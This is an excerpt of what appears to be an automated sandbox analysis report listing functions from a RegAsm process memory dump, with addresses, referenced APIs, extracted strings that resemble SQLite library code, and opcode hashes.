Instruction Fuzzy Hash: 464234B4D08289CFDB80CFA8C18479DBBF1BB49308FA4C45AD8549B345D776E8A6CB51

Function 61E64E0C Relevance: 9.5, Strings: 5, Instructions: 3235COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E671D6
N, xrefs: 61E65461
J, xrefs: 61E6511A
, xrefs: 61E67682
`, xrefs: 61E68304

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: $ N$BINARY$J$`
API String ID: 0-2078302688
Opcode ID: a5cb0f9c8b3dcdbf156992509af44ce08b0ff043743e2c012476012ff905d36b
Instruction ID: 8b687d588507154f9b7ca5d7c21d8a58e11a900b957e56d8d79dd7eab4857ed6
Opcode Fuzzy Hash: a5cb0f9c8b3dcdbf156992509af44ce08b0ff043743e2c012476012ff905d36b
Instruction Fuzzy Hash: 3C730474A452698FEB60CF18C880B99B7F1BF49314F6585DAD848AB391D770EE81CF90

Function 61E7B85E Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 1812stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E7BD05

Strings

BINARY, xrefs: 61E7C2A2
q, xrefs: 61E7CF4D
p, xrefs: 61E7BF15
rows inserted, xrefs: 61E7C4C2

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: BINARY$p$q$rows inserted
API String ID: 1004003707-1829360308
Opcode ID: 1ccc950746305ea724a676aa881d898eaf442fcabbf3e3cfa17b4fdc18c60a0b
Instruction ID: 065edfd01cf961ed3b9e2e1e11ae97a3b52417d8b8be7254ab2c95bfb3f70183
Opcode Fuzzy Hash: 1ccc950746305ea724a676aa881d898eaf442fcabbf3e3cfa17b4fdc18c60a0b
Instruction Fuzzy Hash: 8113D574A0425A8FEB21CF68C980B99B7F1AB89304F20C5E9D889A7351D774EEC5CF51

Function 61E62CA3 Relevance: 9.1, Strings: 6, Instructions: 1622COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E63D74
false, xrefs: 61E63127
2, xrefs: 61E630F0
NOCASE, xrefs: 61E63D79
u, xrefs: 61E63A4C
E, xrefs: 61E64125

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: 2$BINARY$E$NOCASE$false$u
API String ID: 0-3666730823
Opcode ID: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
Instruction ID: 6b9246b4563a5e155af7b98e7ab84f845b82c0e831d1f7dba739a0367b6c7f33
Opcode Fuzzy Hash: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
Instruction Fuzzy Hash: 39F24774A442598FDB10CFA8C480B8DBBF5BF49318F65C169E858AB355D734EC86CB90

Function 61E19208 Relevance: 8.5, Strings: 6, Instructions: 967COMMON

Download Yara Rule

Strings

, xrefs: 61E1A20D
Inf, xrefs: 61E1A717
-, xrefs: 61E1997C
NaN, xrefs: 61E19A67
-, xrefs: 61E195B8
$, xrefs: 61E19687

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: $$$-$-$Inf$NaN
API String ID: 0-2883260867
Opcode ID: 0a286a4662fbd0513c824e9775aecebd003bc4414d429b26a07924a03112f653
Instruction ID: 08ada5b9c357915bf8dc0511ebd4b169d1569d08758c0a6763b5a4183e8dfcc3
Opcode Fuzzy Hash: 0a286a4662fbd0513c824e9775aecebd003bc4414d429b26a07924a03112f653
Instruction Fuzzy Hash: 8D92B370E4D2958EDB219B68C881398BBF1AB86344F34C4D9C49D9736AE735CAC9CF41

Function 61E9316A Relevance: 8.3, Strings: 6, Instructions: 804COMMON

Download Yara Rule

Strings

ha, xrefs: 61E932B5
A, xrefs: 61E9338F
snippet, xrefs: 61E931A7
]a, xrefs: 61E932AB
bua, xrefs: 61E93379
ma, xrefs: 61E932BF

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: A$]a$bua$ha$ma$snippet
API String ID: 0-4021802672
Opcode ID: a19dcd913de9ae54b0ac2ef7ce21a003b41be22060cac4ecfbfba69c354da9ff
Instruction ID: b2623b0ed89b922f0be96898bd960c36401f43a5980a856a5f0c11e76d1438fa
Opcode Fuzzy Hash: a19dcd913de9ae54b0ac2ef7ce21a003b41be22060cac4ecfbfba69c354da9ff
Instruction Fuzzy Hash: C392CF7490426ACFDB64CF69C884BC9B7B1BB48314F2486EAD85DAB250D7709EC5CF90

Function 61E86668 Relevance: 8.2, Strings: 6, Instructions: 719COMMON

Download Yara Rule

Strings

missing from index , xrefs: 61E86ED7
d, xrefs: 61E866B5
q, xrefs: 61E86DD9
wrong # of entries in index , xrefs: 61E86DE9
non-unique entry in index , xrefs: 61E8700A
row , xrefs: 61E86EA4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: missing from index $d$non-unique entry in index $q$row $wrong # of entries in index
API String ID: 0-2434882124
Opcode ID: 0a1a1613a58672912d05c53be30d184b8d1e6cbfe232a77c6785959722899b63
Instruction ID: 64764bd2453105caa9badb98113fecf854144ac2eeaebcc13dcf1322e2d74596
Opcode Fuzzy Hash: 0a1a1613a58672912d05c53be30d184b8d1e6cbfe232a77c6785959722899b63
Instruction Fuzzy Hash: 5272E374A042898FDB50DFA8C59079DBBF1BB88304F20C56DE8A8AB395D775E942CF41

Function 61EAF900 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 61EAF94F
UnhandledExceptionFilter.KERNEL32 ref: 61EAF95F
GetCurrentProcess.KERNEL32 ref: 61EAF968
TerminateProcess.KERNEL32 ref: 61EAF979
abort.MSVCRT ref: 61EAF982

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
Instruction ID: c24ac7f06ebf37709200600ee493e26a75483ae19b01d267103323a56ae8c6ad
Opcode Fuzzy Hash: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
Instruction Fuzzy Hash: A911C0B5A14A04CFDB00EFB9D64861EBBF0EB5A304F548929E998CB311E774D9848F52

Function 61EA0BA9 Relevance: 6.9, Strings: 5, Instructions: 655COMMON

Download Yara Rule

Strings

bua, xrefs: 61EA139A
DESC, xrefs: 61EA1392
bua, xrefs: 61EA0CD2
, xrefs: 61EA131C
ASC, xrefs: 61EA138A

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: $ASC$DESC$bua$bua
API String ID: 0-1029442847
Opcode ID: c0e20bf15ea0d7117ae95372cad96b4f28515aa5a5de7197a05911a2fde48002
Instruction ID: 8ab5de4e3564c360289137fee1b889a4ea914830ed3e88a553d2216b992680de
Opcode Fuzzy Hash: c0e20bf15ea0d7117ae95372cad96b4f28515aa5a5de7197a05911a2fde48002
Instruction Fuzzy Hash: 0852E2B4A053498FDB10CFA9C580A8EBBF1BF89304F25856DE899AB351D734E846CF51

Function 61E95D7A Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 634COMMON

Download Yara Rule

Strings

bua, xrefs: 61E95E6E

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: bua
API String ID: 0-3993766197
Opcode ID: 52c6be3e544cde4861d3357b588add8e778dedffd4832021fb38687e275be97c
Instruction ID: 89212f946684aa561643b7df03f99292a836ac537f2e11e87534a7b7dd14634b
Opcode Fuzzy Hash: 52c6be3e544cde4861d3357b588add8e778dedffd4832021fb38687e275be97c
Instruction Fuzzy Hash: 80520870E05299CFDB01DFE8C484A8DBBF1BF48314F65886AE854AB355D774E886CB81

Function 61E69E8F Relevance: 5.1, Strings: 3, Instructions: 1365COMMON

Download Yara Rule

Strings

bua, xrefs: 61E69F31
UNION, xrefs: 61E6A36F, 61E6AB2F, 61E6AD4A
, xrefs: 61E6B27C

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: $UNION$bua
API String ID: 0-1951513331
Opcode ID: 484f936c52078ef03e8e45535e4db59632d2c37872dbdda9dbf99a4ed5ca4021
Instruction ID: 9efb736ff544b0c2fdcebf589f92ceeca8f8718efffafec2a72c2baed2a884dd
Opcode Fuzzy Hash: 484f936c52078ef03e8e45535e4db59632d2c37872dbdda9dbf99a4ed5ca4021
Instruction Fuzzy Hash: EAE2E374A442698FDB60CF68C990B9DBBF1BF88304F60C099E898AB355DB35D985CF41

Function 61E4E4BF Relevance: 5.0, APIs: 3, Instructions: 1300COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 61E4F618
memmove.MSVCRT ref: 61E4F713
memmove.MSVCRT ref: 61E4F7B5

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 897cc582af99ee48924e3051ddcb871bd2fc9216c8cb1f4867e570ccacb3d871
Instruction ID: bc40f1fef1a9170960cc57993c705059dbee377a108b532450c26420989eb83f
Opcode Fuzzy Hash: 897cc582af99ee48924e3051ddcb871bd2fc9216c8cb1f4867e570ccacb3d871
Instruction Fuzzy Hash: ACE2F174A046698FCB65CF69D880BD9B7F1BF89314F2481E9D948A7314D738AE85CF80

Function 61E77452 Relevance: 4.4, Strings: 2, Instructions: 1874COMMON

Download Yara Rule

Strings

rows updated, xrefs: 61E78DEC
ROWID, xrefs: 61E777EF

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: ROWID$rows updated
API String ID: 0-3149524134
Opcode ID: 6c3f6c42703f7f38b9098feffe57c6db12f40f4b4a9cc3435f8a7506e590b8fb
Instruction ID: d39c60c32cc69d7ad3465f9f6cb7242007ae0eab8187012a9ec74863cc1168bc
Opcode Fuzzy Hash: 6c3f6c42703f7f38b9098feffe57c6db12f40f4b4a9cc3435f8a7506e590b8fb
Instruction Fuzzy Hash: 5913E474A04259CFEB20CFA8C484B9DBBF1BF89308F208559D899AB355D774E986CF41

Function 61E6DDA5 Relevance: 4.1, Strings: 3, Instructions: 351COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 61E74182
$va, xrefs: 61E741D9
(, xrefs: 61E6E29B

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: $va$($string or blob too big
API String ID: 0-3448955768
Opcode ID: b9a2e2e4c654b18e60725bc55a6a3754bc963e451acf320c2e7420e9f1d3aa01
Instruction ID: b6e0e817358a091974468e7adaedc076c3e46fc0117c532e15c918051c0b76fc
Opcode Fuzzy Hash: b9a2e2e4c654b18e60725bc55a6a3754bc963e451acf320c2e7420e9f1d3aa01
Instruction Fuzzy Hash: 0AF16675D446288BDB68CF19CC803C8B7B5BB59318FA981D9D88867385D774EEC18F81

Function 61E9F0ED Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 858COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E9F2E4

Strings

, xrefs: 61E9F16F

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-3916222277
Opcode ID: 1276a7daeeb978b136c794fd150aa3a3684a539a144effab709a524842f9c26f
Instruction ID: bfece18307556e4ef4cbbc35f99f21af59f03d97bd6a6be96c4aa07d47f44be4
Opcode Fuzzy Hash: 1276a7daeeb978b136c794fd150aa3a3684a539a144effab709a524842f9c26f
Instruction Fuzzy Hash: 9F82D375E04259CFDB04CFA8C580A8DBBF1BF88308F258569E859AB355D778E946CF80

Function 61E31DAB Relevance: 3.1, Strings: 2, Instructions: 599COMMON

Download Yara Rule

Strings

?, xrefs: 61E31DE4
@, xrefs: 61E3231B

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: ?$@
API String ID: 0-1463999369
Opcode ID: 17282316eccadc5d136356c8655e5051220d6aaf7da56665674151cdb10d9dda
Instruction ID: eb37215bc7a8fd5f0b65b01ac5f6a00cefd0b4980fd33cabf8589fd9f13e8be8
Opcode Fuzzy Hash: 17282316eccadc5d136356c8655e5051220d6aaf7da56665674151cdb10d9dda
Instruction Fuzzy Hash: 11422734E0426A8BDB11CFA9C5807DDBBF1BF99314F248199D894AB391D335E986CF90

Function 61E5BC4C Relevance: 3.0, Strings: 2, Instructions: 526COMMON

Download Yara Rule

Strings

GROUP BY, xrefs: 61E5BF03
DISTINCT, xrefs: 61E5BF10

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: DISTINCT$GROUP BY
API String ID: 0-3434263116
Opcode ID: 02b098dc5b465e043b2cc5d5a259ff0751bebab7385fc789f92dbe92457b21f0
Instruction ID: 4c896da18e7b6933a4bf18ae273737871ab627c44bad69357c45c5ba8bc331e8
Opcode Fuzzy Hash: 02b098dc5b465e043b2cc5d5a259ff0751bebab7385fc789f92dbe92457b21f0
Instruction Fuzzy Hash: 91429E74A042698FEB60CF28C990B99B7F1AF89304F21C4D9E94DA7351DB35EE818F51

Function 61E62554 Relevance: 3.0, Strings: 2, Instructions: 459COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E62831, 61E62877, 61E628BA, 61E628D8
0, xrefs: 61E6283F

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
